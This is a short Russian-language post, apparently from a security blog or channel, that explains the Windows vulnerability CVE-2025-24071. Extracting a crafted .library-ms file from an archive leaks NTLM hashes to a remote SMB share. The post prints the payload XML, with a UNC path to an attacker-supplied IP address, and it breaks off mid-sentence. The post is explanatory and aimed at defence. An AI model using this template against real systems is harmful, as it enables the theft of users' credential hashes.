18.03.2025 был опубликовано исследование об уязвимости CVE-2025-24071. Её эксплуатация заключается в том, что если разархивировать специально подготовленный файл с расширением .library-ms из RAR или ZIP-архива, произойдёт автоматическое обращение на сетевой ресурс с попыткой аутентификации. Это называется утечкой NTLM-хэша, с которым атакующий может собирать хэши паролей с хостов в инфраструктуре. Уязвимость имеет публично-доступный Proof-of-Concept. ❗️Примечательно, что пользователю не нужно открывать файл, достаточно его разархивировать, а доставить архив можно, например, с помощью фишинга. Сам файл .library-ms представляет из себя XML-файл: <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <searchConnectorDescriptionList> <searchConnectorDescription> <simpleLocation> <url>\\\\{ip_address}\\shared</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription> Как вы може
Защищены ли вы от уязвимости CVE-2025-24071 в Windows?
23 марта 202523 мар 2025
42
1 мин